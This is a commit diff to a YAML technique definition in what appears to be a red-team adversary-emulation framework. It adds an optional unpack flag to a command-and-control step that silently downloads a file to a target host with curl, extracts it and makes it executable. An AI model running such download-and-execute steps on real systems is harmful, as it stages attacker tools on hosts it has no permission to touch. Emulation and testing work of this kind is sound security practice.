improve tool upload TTP

diff --git a/armory/TTPs/CommandAndControl/upload_tool_or_file.yaml b/armory/TTPs/CommandAndControl/upload_tool_or_file.yaml
--- a/armory/TTPs/CommandAndControl/upload_tool_or_file.yaml
+++ b/armory/TTPs/CommandAndControl/upload_tool_or_file.yaml
@@ -9,19 +9,24 @@ parameters:
   DST_PATH:
     type: string
     description: Path on the target system where the file will be transfered
+  Unpack:
+    type: bool
+    description: Flag if the file should be unpacked after transfer
   # DST_DIR:
   #   type: string
   #   description: Path on the target system where the file will be transfered
 cmdVariants:
   - key: curl
     command: >
-      curl -L ${SRC_PATH} {{ if .DST_PATH }} -o ${DST_PATH} {{ else }} -O {{ end }} &&
+      curl -sL ${SRC_PATH} {{ if .DST_PATH }} -o ${DST_PATH} {{ else }} -O {{ end }} &&
       {{ if .DST_PATH }}
-      f=`basename ${DST_PATH}` `
+      f=${DST_PATH}; 
       {{ else }}
-      f=`ls -t | head -n1` 
+      f=`ls -t | head -n1`; 
       {{ end }}
-      && if [ ! -f "$f" ]; then echo "Could not identify downloaded file." && exit 1; fi;  
+      echo "file: $f"; 
+      if [ ! -f "$f" ]; then echo "Could not identify downloaded file." && exit 1; fi;  
+      {{ if .Unpack }}
       case "$f" in
         *.tar.gz|*.tgz) out=`tar -xzf "$f"` ;; 
         *.tar.bz2|*.tbz2) out=`tar -xjf "$f"` ;; 
@@ -32,9 +37,11 @@ cmdVariants:
         *.xz) out=`basename "$f" .xz`; unxz "$f" ;; 
         *.7z) out=`7z x "$f" | awk '/Extracting  / {print $2}'` ;; 
         *.rar) out=`unrar x -idq "$f" | awk '/Extracting  / {print $2}'` ;; 
-        *) echo "Unsupported file type"; exit 2 ;; 
       esac; 
       for x in $out; do [ -f "$x" ] && chmod +x "$x"; done;
+      {{ else }}
+      chmod +x "$f";
+      {{ end}}
     isLocal: false
   # - key: curl
   #   command: curl -F 'data=@${SRC_PATH}' ${DST_PATH}
